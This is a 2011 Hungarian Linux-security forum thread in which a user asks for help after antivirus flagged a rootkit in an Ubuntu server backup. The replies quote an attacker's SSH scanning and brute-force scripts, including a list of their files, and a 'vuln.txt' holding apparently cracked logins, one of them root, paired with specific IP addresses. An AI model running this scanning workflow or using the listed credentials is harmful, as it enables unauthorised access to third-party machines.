Avira 'LINUX/RootKIT/D' találat egy Ubuntu backupban

( Deacon | 2011. 01. 13., cs - 14:48 )
Linux-security

Sziasztok! Nemrég készítettem mentést egy Ubuntu 8.04.4 LTS rendszerről (a fontosabb könyvtárakat egy még évekkel ezelőtt készített szkripttel bepakoltam egy tar.gz-be), aztán leszedtem a gépemre, ahonnan archiválhatom. De gondoltam, előtte mégiscsak kicsomagolom, és átnézem, van-e benne olyan, amit felesleges menteni... Aztán kicsomagolás közben szólt az Avira, hogy rootkit rejtőzik a fájlok között:

Az rkhunter és chkrootkit nem talált semmit, ellenben a "rai" könyvtárban van egy pár fájl, amiben román nyelvű szöveg is akad :S Első körben nem jutottam nyomára, mi a franc lehet ez, ha bárki útbaigazít, annak nagyon megköszönöm!

( muszi v | 2011. 01. 13., cs - 15:43 )

van egy pár fájl, amiben román nyelvű szöveg is akad

Ha esetleg beidezned a szoveget, esetleg az egesz szkriptet...

( Deacon | 2011. 01. 13., cs - 15:56 )

ilyen fájlokat találtam:

.scan.swp
97.pscan.22
mfu.txt
pass_file
ps
scan
ss
ssh-scan
vuln.txt

"go.sh" tartalma:

./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt

"scan" tartalma:

[...]
cat $1.pscan.22 |sort |uniq > mfu.txt
echo "${WHI}[${MAG}+${WHI}]${GRN} Incep Scannarea De User Pass ${RES}"
./ssh-scan 100
rm -rf $1.pscan.22
echo "${WHI}[+]${YEL} Aproape Ca Ai Reusit..Mai Incearca Alta Clasa.. ${RES}"
[...]

"vuln.txt":

root:marko:83.151.28.197
nicola:nicola:83.135.139.113

"ss" és "ssh-scan" bináris